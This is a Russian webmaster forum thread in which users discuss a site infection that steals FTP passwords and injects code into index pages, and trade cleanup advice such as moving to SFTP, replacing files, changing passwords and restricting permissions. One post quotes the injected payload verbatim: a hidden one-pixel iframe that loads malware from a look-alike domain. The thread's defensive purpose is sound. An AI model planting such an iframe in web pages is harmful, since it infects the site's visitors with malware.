- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
через sftp конектиться попробуйте если есть на хостинге
Да, кстати, через SFTP пока еще таких проблем нет, в качестве клиента рекомендую WinSCP, у него же есть плагин к FAR
Работает вирус по стандартной схеме: как-то достает пароль к ФТП, после чего на индексные страницы добавляет <iframe src="http://yanbex.com/yandex/in.cgi?2" width=1 height=1 style="visibility:hidden"></iframe>
Обычно вирус цепляют к .htaccess, полностью удалите его, замените со своего компа.
Либо к индексным файлам, лечение аналогичное полное удаление, замена файла
Пароль к ФТП сменить.
если дыра на хостинге, дополнительно можно удалить права на запись индехфайлов из панели.
Хостинг mchost.ru
в тех. поддержке сказали, что не их вина 99%:)
Касперский ничего не находит на компе.
Попробовал так: загружяю файлы и сразу меняю пароль к фтп в панели, его кладу в блокнот. тоесть вообще им не пользовался. Посмотрим результат...
У меня похожая ситуация была, оказалось что какой то вирь воровал пароли из TC.
А я еще голову ломал, как такое может быть ? Пароли наверное раз 6 менял, а все без толку.
В общем перешел на WinSCP и все стало нормально.
Попробовал так: загружяю файлы и сразу меняю пароль к фтп в панели, его кладу в блокнот. тоесть вообще им не пользовался. Посмотрим результат...
Не надо так мучатся! Ставите на файл индексной страницы права 444 и все в порядке! Вирус код вставляет в в файлы с именем index с любым разрешением. Вот. Была аналогичная проблема - так причину и не нашли. Решилось все установлением на сервере блокировщика фтп по айпишнику. Удобная штука все-таки!
pianist, а у Вас FTP-менеджер не Total Comander (вроде так пишется)? Если он - то он и проблема.
Вот, если что, ссылка нормальная на информацию по минимальной защите сайта: http://www.jino.ru/support/manuals/security.html
SFTP
Сорри за оффтоп, а его должен поддерживать хостинг или как можно через него?
Стоит Total Comander, но через него я заливаю только на файлообменники. А на сайты мелкие файлы через проводник IE.
Ладно, буду примменять сейчас советы прочитаные здесь.
Сорри за оффтоп, а его должен поддерживать хостинг или как можно через него?
если есть доступ по ssh к хосту, то в большинстве случаев это означает, что у вас есть и доступ по sftp .
Кстати, некоторое время назад наткнулся на интересное поведение вируса на одном сайте. Может я что-то пропустил, но раньше такого не встречал - вирус пишется не в конец файла как обычно, а находит место, где находятся скрипты счётчиков (а может просто смотрит тег <script>) и приписывается после них. А на фоне ливеинтернетовского счётчика я и не сразу заметил.
Этот iframe подгружает вирус, который, правда, ловит Касперский(как другие антивирусы не знаю).
не факт, что там всего один вирус, и остальные антивирус ловит...